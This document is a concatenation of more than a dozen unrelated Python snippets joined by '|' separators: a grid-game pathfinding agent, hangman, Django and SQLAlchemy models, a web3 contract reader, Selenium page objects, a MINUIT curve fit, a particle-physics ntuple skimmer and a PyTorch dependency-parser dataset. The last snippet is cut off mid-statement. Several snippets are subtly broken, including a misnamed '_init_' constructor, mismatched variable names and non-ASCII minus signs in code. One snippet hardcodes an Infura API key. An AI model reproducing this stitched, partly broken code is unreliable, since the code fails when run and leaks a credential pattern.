#pop the last element of the list out, if this node is adjecent to agent, then just call path_to_action function with the correct path
# if this node is not adjecent to agent, do a A* search, return all the path coordinates that the agent need to follow, then call path_to_actions to get a series of moves
def take_action(self):
start = (self.agent_x, self.agent_y)
if self.tree_location:
tree_location = self.tree_location
if self.door_location:
door_location = self.door_location
if self.axe_location[-1] == start and self.axe_location:
self.inventory['a'] = True
if self.key_location[-1] == start and self.key_location:
self.inventory['k'] += 1
if self.gold_location[-1] == start and self.gold_location:
self.inventory['$'] = True
## your original code, if there is unvisited land then walk around until you can't
if len(self.unvisited) != 0:
end = self.unvisited.pop()
if abs(start[0] - end[0]) + abs(start[1] - end[1]) == 1:
return self.path_to_actions([start, end])
else:
path = self.aStar(self.grid[start[0]][start[1]], self.grid[end[0]][end[1]])
if not path:
return
return self.path_to_actions(path)
## if there is a tree that you can reach and if you also have an axe, return the path to that tree
if self.tree_location:
if len(tree_location) != 0 and self.inventory['a'] == True and self.aStar(self.grid[start[0]][start[1]], self.grid[tree_location[0][0]][tree_location[0][1]]) != None:
end = tree_location.pop()
if abs(start[0] - end[0]) + abs(start[1] - end[1]) == 1:
return self.path_to_actions([start, end])
else:
path = self.aStar(self.grid[start[0]][start[1]], self.grid[end[0]][end[1]])
if not path:
return
return self.path_to_actions(path)
## same methodology as the tree, but for a door
if self.door_location:
if len(self.door_location) != 0 and self.inventory['k'] > 0 and self.aStar(self.grid[start[0]][start[1]], self.grid[door_location[0][0]][door_location[0][1]]) != None:
end = self.door_location.pop()
if abs(start[0] - end[0]) + abs(start[1] - end[1]) == 1:
return self.path_to_actions([start, end])
else:
path = self.aStar(self.grid[start[0]][start[1]], self.grid[end[0]][end[1]])
if not path:
return
return self.path_to_actions(path)
## if you have explored all unvisited white spaces and you have a raft, its now time to go on water
if self.inventory['r'] >= 1:
end = self.unvisitedwater.pop()
if abs(start[0] - end[0]) + abs(start[1] - end[1]) == 1:
return self.path_to_actions([start, end])
else:
path = self.aStar(self.grid[start[0]][start[1]], self.grid[end[0]][end[1]])
if not path:
return
return self.path_to_actions(path)
# convert a list of coordinate tuples to a list of actions
def path_to_actions(self, path):
actions = []
for i in range(len(path) - 1):
abs_x = path[i + 1][0] - path[i][0]
abs_y = path[i + 1][1] - path[i][1]
actions += mapping_table[(abs_x, abs_y, self.direction)]
if self.get_front_tail().value == 'T' and self.inventory['a'] == True:
actions.insert(-1, 'c')
if self.get_front_tail().value == '-' and self.inventory['k'] == True:
actions.insert(-1, 'u')
self.direction = get_direction[(abs_x, abs_y)]
self.agent_x += abs_x
self.agent_y += abs_y
return actions
############################################################################################
######################## Above are the code for Node and Agent class #######################
agent = Agent()
actions = []
# function to take get action from AI or user
def get_action(view):
global actions
if len(actions) == 0:
agent.update_from_view(view)
actions += agent.take_action()
print('The action that supposed to take is: {0}'.format(actions) , '\n')
actions.pop(0)
else:
print('The action that supposed to take is: {0}'.format(list(actions.pop(0))), '\n')
while 1:
inp = input("Enter Action(s): ")
agent.update_from_move(inp)
return inp
# while 1:
# inp = input("Enter Action(s): ")
# inp.strip()
# final_string = ''
# for char in inp:
# if char in ['f','l','r','c','u','b','F','L','R','C','U','B']:
# final_string += char
# if final_string:
# agent.update_from_move(final_string[0])
# return final_string[0]
# helper function to print the grid
def print_grid(view):
print('+-----+')
for ln in view:
print("|"+str(ln[0])+str(ln[1])+str(ln[2])+str(ln[3])+str(ln[4])+"|")
print('+-----+')
if __name__ == "__main__":
# checks for correct amount of arguments
if len(sys.argv) != 3:
print("Usage Python3 "+sys.argv[0]+" -p port \n")
sys.exit(1)
port = int(sys.argv[2])
# checking for valid port number
if not 1025 <= port <= 65535:
print('Incorrect port number')
sys.exit()
# creates TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# tries to connect to host
# requires host is running before agent
sock.connect(('localhost',port))
except (ConnectionRefusedError):
print('Connection refused, check host is running')
sys.exit()
# navigates through grid with input stream of data
i=0
j=0
while 1:
data=sock.recv(100)
if not data:
exit()
for ch in data:
if (i==2 and j==2):
view[i][j] = '^'
view[i][j+1] = chr(ch)
j+=1
else:
view[i][j] = chr(ch)
j+=1
if j>4:
j=0
i=(i+1)%5
if j==0 and i==0:
print_grid(view) # COMMENT THIS OUT ON SUBMISSION
action = get_action(view) # gets new actions
sock.send(action.encode('utf-8'))
sock.close()
|
##### 1a. Data Utilities (15 pts)
import os
import json
def get_data(): ###Get data function
fname = os.path.join(os.path.dirname(__file__),'senate-stock-trades.json')
module = -1000000000 ### sentinel value
if module == -1000000000:
f = open(fname,)
module = json.load(f)
return module
def add_amount_ranges(amount_range_1, amount_range_2 ): ### add amount ranges function
if amount_range_1[0] != None and amount_range_2[0] != None:
sum_range_min = int(amount_range_1[0]) + int(amount_range_2[0])
else:
sum_range_min = None
if amount_range_1[1] != None and amount_range_2[1] != None:
sum_range_max = int(amount_range_1[1]) + int(amount_range_2[1])
else:
sum_range_max = None
ans = (sum_range_min, sum_range_max)
return ans
def sub_amount_ranges(amount_range_1, amount_range_2): ### Subtract amount ranges function
if amount_range_1[0] != None and amount_range_2[0] != None:
diff_range_min = int(amount_range_1[0]) - int(amount_range_2[0])
else:
diff_range_min = None
if amount_range_1[1] != None and amount_range_2[1] != None:
diff_range_max = int(amount_range_1[1]) - int(amount_range_2[1])
else:
diff_range_max = None
ans = (diff_range_min, diff_range_max)
return ans
|
#!/usr/bin/python
import sys
expectedResult = [
'100000005 1',
'100000066 1',
'100000066 5',
'100002460 12',
'100003192 8',
'100003268 15',
'100004467 12',
'100004467 20',
'100004819 4',
'100005156 17',
'100007808 12',
'100008254 22',
'100010128 14',
'100012200 5',
'100019875 5',
'100020526 14',
'100071170 5',
'100071170 12',
'999999999 9',
'999999999 12'
]
pointer = 0
for line in sys.stdin:
if pointer >= len(expectedResult):
print 'Error, more lines than expected'
sys.exit(1)
if line.strip() != expectedResult[pointer]:
print 'Error in line ', pointer + 1
print 'Expected: "', expectedResult[pointer], '"'
print 'Input: "', line.strip(), '"'
sys.exit(2)
pointer += 1
if pointer < len(expectedResult):
print 'Error, less lines than expected'
sys.exit(3)
print 'Test passed!'
|
def jogar():
print("(*******************************")
print("Bem vindo ao jogo de Forca!!")
print("(*******************************")
palavra_secreta = 'arroz'
letras_acertadas =["_","_","_","_","_"]
enforcou = False
acertou = False
print("{}".format(letras_acertadas))
while(not enforcou and not acertou):
chute = input("Qual Letra?")
chute = chute.strip() #tira os espações em branco
index = 0
for letra in palavra_secreta:
if (chute.upper() == letra.upper()):
letras_acertadas[index] = letra
index = index + 1
print("{}".format(letras_acertadas))
if (__name__ == "__main__"): # quando é rodado diretamente, seta como __main__
jogar()
|
from sqlalchemy import Column, String, Integer
from bd import Base
class User(Base):
__tablename__ = 'user'
user_id = Column(Integer, primary_key=True)
firstName = Column(String)
lastName = Column(String)
gender = Column(String)
level = Column(String)
def _init_(self,user_id,firstName,lastName, gender,level):
self.user_id = user_id
self.firstName = firstName
self.last_name = lastName
self.gender = gender
self.level = level
def __repr__(self):
return "<User(user_id={}, firstName={}, lastName={}, gender={}, level={})>"\
.format(self.user_id, self.firstName, self.lastName, self.gender,self.level)
def __eq__(self, otro):
return self.user_id == otro.user_id
def __hash__(self):
return hash((self.user_id))
|
# Generated by Django 2.1.2 on 2018-11-24 15:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('orders', '0005_basket_state_of_status'),
]
operations = [
migrations.AlterField(
model_name='basket',
name='state_of_status',
field=models.CharField(choices=[('new', 'новий'), ('executed', 'виконаний')], default='new', max_length=10, verbose_name='Статус кошика'),
),
]
|
# coding: utf-8
import cfg
import re
import codecs
def pre_train():
label_dict = {}
with open(cfg.DATA_PATH + 'evaluation_public_origin.tsv', 'r') as f:
lines = [line.strip().split('\t') for line in f.readlines()]
# 删除文章内容为空的样例, 所有文章内容为空的样例都判定为负标签
for n, line in enumerate(lines):
if line[2] == '':
label_dict[line[0]] = 'NEGATIVE'
lines.pop(n)
# 删除完全相同的文章, 如果两篇文章完全相同, 判定文章为正标签
content_pool = {}
for n, line in enumerate(lines):
if line[2] != '':
if line[2] not in content_pool:
content_pool[line[2]] = [n, line[0]]
else:
label_dict[line[0]] = 'POSITIVE'
id_dup = content_pool[line[2]][1] # 取出与之重复的那篇文章的 id
line_num = content_pool[line[2]][0] # 取出与之重复的那篇文章的行号
label_dict[id_dup] = 'POSITIVE'
lines.pop(n)
lines.pop(line_num)
# 开头是{,接着是两个或两个以上的空白符或字母,接着是是汉字,接着是空白符或者非空白符,结尾为}
PATTERN = re.compile(u'\{[\sA-Za-z:0-9\-_;\.]{2,}[\u4E00-\u9FA5]+[\s\S]*\}')
KEYS = ('pgc', 'text-decoration', 'none', 'outline', 'display', 'block', 'width',
'height', 'solid', 'position', 'relative', 'padding', 'absolute', 'background',
'top', 'left', 'right', 'cover','font-size', 'font', 'overflow', 'bold',
'hidden', 'inline', 'block', 'align', 'center', 'transform', 'space', 'vertical',
'color', 'webkit', 'translatntent')
for n, line in enumerate(lines):
key_num = 0
for key in KEYS:
if key in line[2]:
key_num += 1
if key_num >= 1:
if re.search(PATTERN, line[2].replace(' ', '')):
label_dict[line[0]] = 'NEGATIVE'
lines.pop(n)
fw = codecs.open(cfg.DATA_PATH + 'evaluation_public.tsv', 'w', encoding='utf8')
for line in lines:
fw.write('%s\n' % '\t'.join(line))
def pre_evl():
label_dict = {}
with open(cfg.DATA_PATH + 'train_origin.tsv', 'r') as f:
lines = [line.strip().split('\t') for line in f.readlines()]
for n, line in enumerate(lines):
if line[2] == '':
lines.pop(n)
content_pool = {}
for n, line in enumerate(lines):
if line[2] != '':
if line[2] not in content_pool:
content_pool[line[2]] = [n, line[0]]
else:
id_dup = content_pool[line[2]][1]
line_num = content_pool[line[2]][0]
lines.pop(n)
lines.pop(line_num)
# 开头是{,接着是两个或两个以上的空白符或字母,接着是是汉字,接着是空白符或者非空白符,结尾为}
PATTERN = re.compile(u'\{[\sA-Za-z:0-9\-_;\.]{2,}[\u4E00-\u9FA5]+[\s\S]*\}')
KEYS = ('pgc', 'text-decoration', 'none', 'outline', 'display', 'block', 'width',
'height', 'solid', 'position', 'relative', 'padding', 'absolute', 'background',
'top', 'left', 'right', 'cover','font-size', 'font', 'overflow', 'bold',
'hidden', 'inline', 'block', 'align', 'center', 'transform', 'space', 'vertical',
'color', 'webkit', 'translatntent')
for n, line in enumerate(lines):
key_num = 0
for key in KEYS:
if key in line[2]:
key_num += 1
if key_num >= 1:
if re.search(PATTERN, line[2].replace(' ', '')):
lines.pop(n)
fw = codecs.open(cfg.DATA_PATH + 'train.tsv', 'w', encoding='utf8')
for line in lines:
fw.write('%s\n' % '\t'.join(line))
fw = open(cfg.DATA_PATH + 'result_part.csv', 'w')
for key in label_dict:
fw.write('%s,%s\n' % (key, label_dict[key]))
|
import json
import datetime
from web3 import Web3, HTTPProvider
postwall_artifact = json.load(open('./app/static/Postwall.json'))
postwall_address = postwall_artifact["networks"]["3"]["address"]
postwall_abi = postwall_artifact['abi']
# check connection and get enode
w3 = Web3(HTTPProvider('https://ropsten.infura.io/v3/c9402e213aa94b979dc80abc164c109d'))
print(f"web3 provider is connected: {w3.isConnected()}")
# instantiate postwall contract
contract = w3.eth.contract(abi=postwall_abi, address=postwall_address)
def get_posts (user = None):
# get post data from contract Postwall
posts_raw = contract.functions.getPosts().call()
# tranform post data into json format
posts_json = []
posts_display = []
post_ids = posts_raw[0]
post_timestamp = posts_raw[1]
post_author = posts_raw[2]
post_content = posts_raw[3]
for i, id in enumerate(post_ids):
posts_json.append({
"id": id,
"timestamp": datetime.datetime.utcfromtimestamp(post_timestamp[i]),
"author": post_author[i],
"content": post_content[i]})
posts_json.reverse()
if user == None:
posts_display = posts_json
else:
user = user.lower()
for post in posts_json:
if post["author"].lower() == user:
posts_display.append(post)
return posts_display
if __name__ == "__main__":
get_posts()
|
#列表
#元祖
#集合
|
#!/usr/bin/env python
from main.page.desktop_v3.sales.pe_myshop_order_base import *
from selenium.webdriver.common.by import By
import time
class MyshopOrderPage(MyshopOrderBasePage):
_page = "myshop_order.pl"
#Locators
#search invoice box, deadline response select box, dan search invoice button nya merupakan 1 set
_search_invoice_bar_loc = (By.CSS_SELECTOR, 'div.row-fluid form#form-filter div.input-append input.input-medium')
_deadline_response_select_box_loc = (By.CSS_SELECTOR, 'div.row-fluid form#form-filter div.input-append a.selectBox-dropdown')
_search_invoice_button_loc = (By.CSS_SELECTOR, 'div.row-fluid form#form-filter div.input-append button.btn')
# instance variable
#_condition_order_loc = (By.XPATH, "//*[@id='change-template']")
_condition_order_loc = (By.CSS_SELECTOR, "div#change-template")
_order_table_loc = (By.CSS_SELECTOR, "div.list-box-content table.transaction-table")
_list_order_loc = (By.XPATH, "//div[@class='list-box-content']/table")
_btn_response_loc = (By.CSS_SELECTOR, "div.dialog-footer button.btn-action")
#_after_submit_loc = (By.XPATH, "//button[text()='Ok']")
_after_submit_loc = (By.CSS_SELECTOR, "div.dialog-content div.container-fluid div.row-fluid div.dialog-footer button.btn-action")
#counter
_counter_loc = (By.XPATH, "//*[@class='count-sales-new-order-value']")
#next page
_next_page_loc = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div[4]/div[2]/div/div/div[2]/div[2]/div/div/ul/li[last()]/a/strong")
#Action
def open(self, site=""):
self._open(site, self._page)
def response_order(self, inv):
found = False
#print (self.find_element(*self._condition_order_loc).text)
#condition_order = self.find_element(*self._condition_order_loc)
# if("No Order List" in condition_order.text or "Tidak ada Daftar Pemesanan" in condition_order.text):
# print("No Order List")
try:
self.find_element(*self._order_table_loc)
counter = int(self.find_element(*self._counter_loc).text)
j, r, s = 0, int(counter/10), int(counter%10)
if(s > 0):
r += 1
while j < r and not found:
print("Page", int(j+1))
list_order = self.driver.find_elements(*self._list_order_loc)
for i in list_order:
if inv in i.text:
time.sleep(2)
id_order = i.find_element(By.TAG_NAME, "tr").get_attribute("id")
time.sleep(2)
response_order = self.driver.find_element(By.XPATH, "//*[@id='"+id_order+"']/td[3]/div[3]/div/form/div[1]/div/div[2]/button")
response_order.click()
found = True
break
j += 1
if(j < r and not found):
self.next_page()
print("Next page MyshopOrder")
time.sleep(2)
if(found == True):
self.driver.find_element(*self._btn_response_loc).click()
print("Response", inv)
time.sleep(4)
self.driver.find_element(*self._after_submit_loc).click()
print ("after submit btn sukses")
if(not found):
print(inv, "not found!")
time.sleep(1)
except:
print ("No Order")
def next_page(self):
try:
next = self.driver.find_element(*self._next_page_loc)
next.click()
time.sleep(2)
except Exception as inst:
print(inst)
|
def get_sum(a,b):
num = 0
if a == b:
return b
elif b > a:
for i in range(a, b+1):
num += i
return num
else:
for i in range(b, a+1):
num += i
return num
print(get_sum(0, -1))
|
from flask_restful import Resource, reqparse, fields, marshal
from common.auth import authenticate
from common.misc import prevent_missing_id
from models import User as U
from models import db
from numbers import Number
import sys
import common.ws as ws
user_fields = {
'id': fields.String,
'username': fields.String
}
class PendingFriend(Resource):
# Protecred endpoint
method_decorators = [authenticate, prevent_missing_id]
# Get all pending friend requests
def get(self, user, **kwargs):
return marshal(user.pending_friends, user_fields)
# Validate a pending friend request
def post(self, id, user):
if id is None:
return {'error': 'missing slug parameter'}, 400
pending_friend = None
for i in user.pending_friends:
if i.id == id:
pending_friend = i
if pending_friend is None:
return {'error': 'pending friend not found'}, 400
# Remove pending friend request
user.pending_friends.remove(pending_friend)
# Add friends
user.friends.append(pending_friend)
pending_friend.friends.append(user)
# Commit changes
db.session.add(user)
db.session.add(pending_friend)
db.session.commit()
# WebSocket call
ws.emit_user(pending_friend, 'friend-accepted', {'user': user.username})
return {}
# Refuse a pending friend request
def delete(self, id, user):
if id is None:
return {'error': 'missing slug parameter'}, 400
pending_friend = None
for i in user.pending_friends:
if i.id == id:
pending_friend = i
if pending_friend is None:
return {'error': 'pending friend not found'}, 400
# Remove pending friend request
user.pending_friends.remove(pending_friend)
# Commit changes
db.session.add(user)
db.session.commit()
return {}
|
total_electrons = int(input())
shells = []
index = 0
while total_electrons > 0:
current_shell_electrons = 2*((index + 1) ** 2)
if total_electrons >= current_shell_electrons:
shells.insert(index, current_shell_electrons)
else:
shells.insert(index, total_electrons)
break
index += 1
total_electrons -= current_shell_electrons
print(shells)
|
# Exercício 9.9 - Livro
files = ['txt/file1.txt', 'txt/file2.txt', 'txt/file3.txt']
for filename in files:
try:
with open(filename, 'r', encoding='UTF-8') as file:
print(file.read())
except FileNotFoundError as error:
print('Arquivo não encontrado!\n')
|
#!/usr/bin/env python
#--------------------------------------------------------------------
# EXAMPLE showing how to set up a fit with MINUIT using pyroot
#--------------------------------------------------------------------
from ROOT import TMinuit, Double, Long
import numpy as np
from array import array as arr
import matplotlib.pyplot as plt
# −− > define some d a t a
ax = arr ('f', (0.05 ,0.36 ,0.68 ,0.80 ,1.09 ,1.46 ,1.71 ,1.83 ,2.44 ,2.09
,3.72 ,4.36 ,4.60) )
ay = arr ('f', (0.35 ,0.26 ,0.52 ,0.44 ,0.48 ,0.55 ,0.66 ,0.48 ,0.75 ,0.70
,0.75 ,0.80 ,0.90) )
ey = arr ('f', (0.06, 0.07, 0.05, 0.05, 0.07, 0.07, 0.09, 0.10, 0.11, 0.10,
0.11, 0.12, 0.10) )
nPoints = len ( ax )
# ---> Set parameters and function to fit
# a list with convenient names
name = ["a", "m", "b"]
# the initial values
vstart = arr('d', (1.0, 1.0, 1.0) )
# the initial step size
step = arr('d', (0.001, 0.001, 0.001) )
npar = len(name)
# function we are going to fit:
def fitfunc(x, npar, apar):
a = apar[0]
m = apar[1]
b = apar[2]
f = Double(0)
f = a*x*x + m*x + b
return f
# the function to minimize, here a chi^2-function
def calcChi2(npar, apar):
chisq = 0.0
for i in range(0, nPoints):
x = ax[i]
curFuncV = fitfunc(x, npar, apar)
curYV = ay[i]
curYE = ey[i]
chisq += ( (curYV - curFuncV)**2/(curYE**2) )
return chisq
# --- fcn -- called by MINUIT repeatedly with varying parameters
# NOTE: the function name is set via TMinuit.SetFCN
def fcn(npar, deriv, f, apar, iflag):
""" meaning of parameters:
npar: # of parameters
deriv: array of derivatives df/dp_i(x), optional
f: value of function to be minimised (typically chi2 or negLogL)
apar: the array of parameters
iflag: internal flag: 1 at first call, 3 at the last, 4 during
minimisation
"""
f[0] = calcChi2(npar, apar)
# --> set up MINUIT
myMinuit = TMinuit(npar) # initialize TMinuit with maximum of npar parameters
myMinuit.setFCN(fcn) # set func to minimize
arglist = arr('d', 2*[0.01])# set error definition
ieflg = Long(0)
arglist[0] = 1. # 1 sigma is Delta chi^2 = 1
myMinuit.mnexcm("SET ERR", arglist, 1, ierflg)
#−−>Set starting values and step sizes for parameters
for i in range(0, npar):
#Define the parameters for the fit
myMinuit.mnparm(i, name[i], vstart[i], step[i], 0, 0, ierflg)
arglist[0] = 6000 # Number of calls to FCN before giving up.
arglist[1] = 0.3 # Tolerance
myMinuit.mnexcm("MIGRAD", arglist, 2, ierflg) # execute the minimisation
#−−> check TMinuit status
amin, edm, errdef = Double(0.), Double(0.), Double(0.)
nvpar, nparx, icstat = Long(0), Long(0), Long(0)
myMinuit.mnstat(amin, edm, errdef, nvpar, nparx, icstat)
#meaning of parameters:
# amin: value of fcn at minimum (=chi^2)
# edm: estimated distance to mimimum
# errdef: delta_fcn used to define 1 sigma errors
# nvpar: number of variable parameters
# nparx: total number of parameters
# icstat: status of error matrix:
# 3 = accurate
# 2 = forced pos.def
# 1 = approximative
# 0 = not calculated
myMinuit.mnprin(3,amin) # print−out by Minuit
#−−> get results from MINUIT
finalPar=[]
finalParErr=[]
p, pe=Double(0), Double(0)
for i in range(0, npar):
myMinuit.GetParameter(i, p, pe) # retrieve parameters and errors
finalPar.append(float(p))
finalParErr.append(float(pe))
#get covariance matrix
buf=arr('d',npar*npar*[0.])
myMinuit.mnemat(buf,npar) # retrieve error matrix
emat=np.array(buf).reshape(npar,npar)
#−−> provide formatted output of results
print "\n"
print "*==*MINUIT fit completed:"
print 'fcn@minimum = %.3g'%(amin), "error code =", ierflg, "status = ", icstat
print "Results: \t value error corr.mat."
for i in range(0,npar):
print' %s: \t%10.3e +/- %.1e '%(name[i], finalPar[i], finalParErr[i]),
for j in range(0,i):
print'%+.3g'%(emat[i][j]/np.sqrt(emat[i][i])/np.sqrt(emat[j][j])),
print''
#−−> plot result using matplotlib
plt.figure()
plt.errorbar(ax, ay, yerr=ey, fmt="o", label='data') # the data
x=np.arange(ax[0], ax[nPoints−1], abs( (ax[nPoints−1]−ax[0])/100.) )
y=fitfunc(x, npar, finalPar) # function at best−fit−point
plt.title("Fit Result")
plt.grid()
plt.plot(x, y, label='fit function')
plt.legend(loc=0)
plt.show()
|
raio = float(input())
PI = 3.14159
area = PI * raio**2
print(f"A={area:.4f}")
|
"""
skim.py: a script to convert ntuples into a preselected ntuple
$ python skim.py --input=/ntuples/*.root* --output=/skims/file.root
"""
import argparse
import array
import copy
import glob
import os
import sys
import ROOT
treename = "XhhMiniNtuple"
ROOT.gROOT.SetBatch()
def main():
ops = options()
if not ops.input:
fatal("Please give a path to --input files for processing")
if not ops.output:
fatal("Please give a path to a --output directory to write to.")
if not ops.filesperjob:
fatal("Please give number of --filesperjob")
input_files = configure_input(ops.input)
for ijob, input_file_chunk in enumerate(chunkify(input_files, int(ops.filesperjob))):
output_file = os.path.join(ops.output, "skim_%04i.root" % (ijob))
skim(input_file_chunk, output_file)
def skim(input_files, output_file):
# select >=2 fat jet sample
selection = ["hcand_boosted_n >= 2",
"hcand_boosted_pt[0] > 350*1000",
"hcand_boosted_pt[1] > 250*1000",
"abs(hcand_boosted_eta[0]) < 2",
"abs(hcand_boosted_eta[1]) < 2",
"hcand_boosted_m[0] > 50*1000",
"hcand_boosted_m[1] > 50*1000",
"jet_ak2track_asso_n[0] >= 2",
"jet_ak2track_asso_n[1] >= 2",
"jet_ak2track_asso_pt[0][0] > 10*1000",
"jet_ak2track_asso_pt[0][1] > 10*1000",
"jet_ak2track_asso_pt[1][0] > 10*1000",
"jet_ak2track_asso_pt[1][1] > 10*1000",
"abs(jet_ak2track_asso_eta[0][0]) < 2.5",
"abs(jet_ak2track_asso_eta[0][1]) < 2.5",
"abs(jet_ak2track_asso_eta[1][0]) < 2.5",
"abs(jet_ak2track_asso_eta[1][1]) < 2.5",
"abs(hcand_boosted_eta[0] - hcand_boosted_eta[1]) < 1.7",
]
selection = " && ".join(["(%s)" % sel for sel in selection])
# inputs
tree = ROOT.TChain(treename)
print
for fi in input_files:
print " + %s" % (fi)
tree.Add(fi)
# skim
if tree.GetEntries() > 0:
skim = tree.CopyTree(selection)
else:
skim = tree
# write
print " o %s" % (output_file)
print
outdir = os.path.dirname(output_file)
if not os.path.isdir(outdir):
os.makedirs(outdir)
outfile = ROOT.TFile.Open(output_file, "recreate")
outfile.cd()
skim.Write()
# summarize
template = "%15s | %12s"
print
print " skim summary"
print "-"*45
print template % ("", "entries")
print "-"*45
print template % (" input", tree.GetEntries())
print template % ("output", skim.GetEntries())
print
print
print " output filesize"
print "-"*45
print " %.4f MB" % (outfile.GetSize()/pow(1024.0, 2))
print
outfile.Close()
def options():
parser = argparse.ArgumentParser()
parser.add_argument("--input")
parser.add_argument("--output")
parser.add_argument("--filesperjob")
return parser.parse_args()
def fatal(message):
sys.exit("Error in %s: %s" % (__file__, message))
def chunkify(li, chunk_size):
return (li[it : it+chunk_size] for it in xrange(0, len(li), chunk_size))
def configure_input(string):
if "root://" in string and "*" in string:
fatal("Sorry, wildcards not yet supported for root:// filesystems.")
elif "*" in string:
return sorted(glob.glob(string))
else:
return [string]
if __name__ == '__main__':
main()
|
import requests,os,json,arrow
from arrow import now
from shapely.geometry import shape
root = "https://earthexplorer.usgs.gov/inventory/json/v/1.4.0"
def makeApiReq(endpoint,data):
r = requests.post(f"{root}/{endpoint}",params="jsonRequest="+json.dumps(data))
return r.json()
def login():
d = makeApiReq("login",{
"username": os.environ["LS_USER"],
"password": os.environ["LS_PASS"],
"authType": "EROS",
"catalogId": "EE",
"applicationContext": "INVSC"
})
return d
def query_data(login_obj,bbox):
apikey = login_obj["data"]
nw,se = bbox["nw"],bbox["se"]
data = {
"datasetName": "LSR_LANDSAT_8_C1",
"spatialFilter": {
"filterType": "mbr",
"lowerLeft": {
"latitude": se[1],
"longitude": nw[0]
},
"upperRight": {
"latitude": nw[1],
"longitude": se[0]
}
},
"temporalFilter": {
"dateField": "search_date",
"startDate": now().shift(months=-1).isoformat(),
"endDate": now().isoformat()
},
"maxResults": 10,
"startingNumber": 1,
"sortOrder": "ASC",
"apiKey": apikey
}
return makeApiReq("search",data)
def get_imgs(bbox):
out = []
l = login()
o = query_data(l,bbox)
for img in o["data"]["results"]:
out.append({
"date": arrow.get(img["acquisitionDate"],'YYYY-MM-DD').format(),
"footprint": shape(img["spatialFootprint"]).wkt,
"img": img["browseUrl"]
})
return out
if __name__ == "__main__":
print(get_imgs({"nw": [-71.30126953125,42.53486817758702], "se": [-70.7958984375,42.204107493733176] }))
|
import pickle
from copy import deepcopy
from dataclasses import dataclass
from random import random, choice, shuffle
from typing import List
import torch
from torch.utils.data import Dataset as PyTorchDataset
from tqdm.auto import tqdm
from parseridge.corpus.relations import Relations
from parseridge.corpus.sentence import Sentence
from parseridge.corpus.vocabulary import Vocabulary
from parseridge.parser.configuration import Configuration
from parseridge.parser.modules.utils import pad_tensor
from parseridge.utils.helpers import Action, T
from parseridge.utils.logger import LoggerMixin
@dataclass
class ConfigurationItem:
sentence: torch.Tensor
stack: torch.Tensor
buffer: torch.Tensor
gold_transition: torch.Tensor
gold_relation: torch.Tensor
wrong_transitions: torch.Tensor
wrong_relations: torch.Tensor
_current_iteration: int = 0
def to(self, device) -> "ConfigurationItem":
new_item = {}
for k, v in self.__dict__.items():
if isinstance(v, torch.Tensor):
new_item[k] = v.to(device)
return ConfigurationItem(**new_item)
def __iter__(self):
return self
def __next__(self):
fields = [v for k, v in self.__dict__.items() if not k.startswith("_")]
if self._current_iteration >= len(fields):
self._current_iteration = 0
raise StopIteration
else:
self._current_iteration += 1
return fields[self._current_iteration - 1]
@dataclass
class ConLLDataset(PyTorchDataset, LoggerMixin):
data_points: List[ConfigurationItem]
vocabulary: Vocabulary
relations: Relations
device: str = "cpu"
def to(self, device: str) -> "ConLLDataset":
data_points = [data_point.to(device) for data_point in self.data_points]
return ConLLDataset(data_points, self.vocabulary, self.relations, device)
def __len__(self):
return len(self.data_points)
def get_length_tensor(self, tensor):
if not len(tensor.shape):
# Handling scalars
return torch.tensor(1, device=self.device)
return torch.tensor(tensor.shape[0], device=self.device)
def __getitem__(self, index: int):
if not self.data_points:
raise ValueError("Call `ConLLDataset.reset()` first to generate data points.")
item = self.data_points[index]
features = []
for feature in item:
features.append(feature)
features.append(self.get_length_tensor(feature))
return tuple(features)
@staticmethod
def collate_batch(batch):
"""
Collate function that must be used in the DataLoader for this DataSet.
Pads the sequences of various length and returns a list of tensors.
Parameters
----------
batch : list of tuples of Tensor
Returns
-------
List of Tensor
"""
# Sort batch according to sentence length
sentence_lengths = [item[1] for item in batch]
order = sorted(
range(len(sentence_lengths)), key=lambda k: sentence_lengths[k], reverse=True
)
batch = [batch[i] for i in order]
ret = []
num_features = len(batch[0])
for idx in range(0, num_features, 2):
lengths = [item[idx + 1] for item in batch]
if not len(batch[0][idx].shape):
# Don't pad scalars
features = torch.stack([item[idx] for item in batch])
else:
max_length = max(lengths)
features = torch.stack(
[pad_tensor(item[idx], max_length, padding=0) for item in batch]
)
ret.append(features)
ret.append(torch.stack(lengths))
return ret
def save(self, path: str):
pickle.dump(self.to("cpu"), open(path, "wb"), protocol=4)
@classmethod
def load(cls, path: str):
return pickle.load(open(path, "rb"))
@dataclass
class TrainingBatch:
sentences: torch.Tensor
sentence_lengths: torch.Tensor
stacks: torch.Tensor
stack_lengths: torch.Tensor
buffers: torch.Tensor
buffer_lengths: torch.Tensor
gold_transitions: torch.Tensor
gold_transitions_lengths: torch.Tensor
gold_relations: torch.Tensor
gold_relations_lengths: torch.Tensor
wrong_transitions: torch.Tensor
wrong_transitions_lengths: torch.Tensor
wrong_relations: torch.Tensor
wrong_relations_lengths: torch.Tensor
@dataclass
class DataGenerator(LoggerMixin):
vocabulary: Vocabulary
relations: Relations
oov_probability: float = 0.25
token_dropout: float = 0.001
error_probability: float = 0.1
device: str = "cpu"
def generate_configuration(self, sentence: Sentence) -> ConfigurationItem:
configuration = Configuration(
sentence, contextualized_input=None, model=None, device=self.device
)
item_filter = set()
for configuration_item in self._generate_next_datapoint(configuration):
feature_key = (
tuple(configuration_item.stack.cpu().tolist()),
tuple(configuration_item.buffer.cpu().tolist()),
)
if feature_key not in item_filter:
item_filter.add(feature_key)
yield configuration_item
def generate_dataset(self, sentences: List[Sentence]) -> ConLLDataset:
new_data_points = []
with tqdm(sentences, desc="Generating training examples", maxinterval=1) as pbar:
for sentence in pbar:
new_data_points += list(self.generate_configuration(sentence))
pbar.set_description(
f"Generating training examples ({len(new_data_points)})"
)
return ConLLDataset(
data_points=new_data_points,
vocabulary=self.vocabulary,
relations=self.relations,
device=self.device,
)
def _generate_next_datapoint(self, configuration):
if not configuration.is_terminal:
stack = configuration.stack_tensor
buffer = configuration.buffer_tensor
possible_actions = list(self._get_possible_action(configuration))
costs, shift_case = configuration.get_transition_costs(possible_actions)
valid_actions = configuration.get_valid_actions(possible_actions, costs)
wrong_actions = configuration.get_wrong_actions(possible_actions, costs)
if valid_actions:
actions = [("valid", choice(valid_actions))]
if random() < self.error_probability and costs[T.SWAP] != 0:
selected_wrong_actions = self._remove_label_duplicates(wrong_actions)
transitions = set([a.transition for a in valid_actions])
selected_wrong_actions = [
a
for a in selected_wrong_actions
